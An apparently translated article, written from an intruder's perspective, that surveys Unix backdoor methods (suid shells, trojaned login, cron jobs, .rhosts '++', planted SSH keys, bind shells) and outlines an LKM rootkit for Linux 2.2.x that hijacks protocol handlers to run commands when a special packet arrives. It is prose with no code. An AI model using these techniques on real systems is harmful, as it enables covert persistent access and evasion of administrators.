Backdoor technology and LinuxLKMRootkit

Backdoor technology and LinuxLKMRootkit-Linux general technology-Linux programming and kernel information. The following is a detailed description. Introduction: In this article, we will see a variety of backdoor technologies, especially Linux Kernel Modules (LKM ). We will find that LKM backdoors are more complex and powerful than traditional backdoors, making them more difficult to detect. After knowing this, we can create our own LKM-based Rootkit program, mainly reflected in the TCP/IP layer, because we believe this is the best place to hide backdoors in front of system administrators.

Preface

In some hacker organizations, Rootkit (or backdoor) is a topic of great interest. Different rootkits are developed and published on the internet. Among these rootkits, LKM is particularly concerned because it uses the module technology of modern operating systems. As part of the kernel, such Rootkit will become more powerful and less noticeable than traditional technologies. Once installed and run on the target machine, the system will be completely controlled in hacker's hands. Even the System Administrators cannot find any trace of security risks because they can no longer trust their operating systems.

This article and some of the powerful LKM programs we have developed are based on Linux Kernel 2.2.x. Our goal is to hide as many footprints as possible.

In the next section, we will introduce the existing backdoor technology, compare it with the LKM technology, and finally discuss the design and implementation of my LKM program.

The purpose of the backdoor program is to grant the hacker system access permission even when the system administrator tries to make up for the system vulnerability. The backdoor program allows the local user to obtain the root permission in this way: Set the uid program, system Trojan program, and cron backdoor.

1. Set the uid program. Hackers put uid script programs in some file systems. Whenever they execute this program, they will become root.

2. System Trojan program. The hacker replaces some system programs, such as the "login" program. Therefore, as long as certain conditions are met, those programs will give hackers the highest permissions.

3. Cron backdoor. A hacker adds or modifies some tasks in cron and runs the program at a specific time to obtain the highest permissions.

The backdoor program can give the remote user the highest access permission: ". rhost" file, ssh authentication key, bind shell, and Trojan service program.

1. ". rhosts" file. Once "++" is added to a user's. rhosts file, anyone can use this account to log in without a password.

2. ssh authentication key. A hacker puts his own public key in the target machine's ssh configuration file "authorized_keys". He can use this account to access the machine without a password.

3. Bind shell. A hacker binds a shell to a specific tcp port. Anyone can telnet this port to obtain the interactive shell. More sophisticated backdoors can be based on udp, unconnected tcp, or even icmp.

4. Trojaned service program. Any opened service can be used as a Trojan to provide remote users with access permissions. For example, use the inetd service to create a bind shell on a specific port, or use the ssh daemon to provide access.

After intruders implant and run Backdoor programs, they will find some methods to joke with the system administrator. This involves two aspects: how to hide his files and how to hide his processes.

To hide files, intruders need to do the following: replace some common system commands such as "ls", "du", "fsck ". At the underlying level, they mark some areas in the hard disk as bad blocks and place their files there. Or if he is crazy enough, he will put some files into the boot block.

To hide a process, he can replace the "ps" program, or modify argv [] to make the program look like a legal service program. Interestingly, if you change a program to an interrupt driver, it will not appear in the process table.

LKM-is there anything worse than this?

We have seen some conventional technologies. Now the question is: can the system administrator find them? In fact, a good system administrator can easily find % 99 of them. The problem is that intruders must modify or create important files. If the system administrator saves a copy of the "tripwire" database, you can determine the existence of security risks. By browsing the file system, you can remove the suid program and the ". rhosts" file.

Instead, we can effectively break through these limits using LKM. First, you do not have to modify or create any files in an important system directory. We can place the LKM program in the/tmp or/var/tmp directory. Generally, the system administrator will not monitor these directories. Second, we can hide anything we want, such as files, processes, and network connections. To obtain this information, you must rely on the system call.

Therefore, we can modify the kernel structure and replace the original system call with our own functions. Finally, we can even attack or modify the TCP/IP protocol stack and fool the system kernel! The following section describes how to use these mechanisms and implementation methods.

Our LKM program is mainly implemented based on Linux Kernel 2.2.x and TCP/IP, because an excellent backdoor program will certainly give remote users access to the system. Opening a port on the target machine makes it very easy to run a service. We need to hide ourselves as much as possible.

The first idea is that we don't run any process on the target machine to wait for the connection. We create a function in the TCP/IP protocol stack to replace it. Whenever a special udp or tcp packet is accepted, the kernel checks the packet to determine whether it is a specified special packet. If yes, the kernel will derive a process to execute the command. We can use any protocol packages supported by the kernel.

Now let's implement it. In the kernel, each protocol registers itself in * inet_protocol_base and * inet_protos [MAX_INET_PROTOS] hash. When the system is initialized, all supported protocols will be registered with inet_protocol_base. They are added to the inet_protos hash table. No matter when an IP packet is reached, the kernel will check the hash table and find corresponding processing functions and system calls. We will perform hack on this point. We will use our processing functions to replace the processing functions of the original protocol. Therefore, we can intercept data packets and analyze them. If it is what we need, we will execute our command. If not, you only need to call the original function.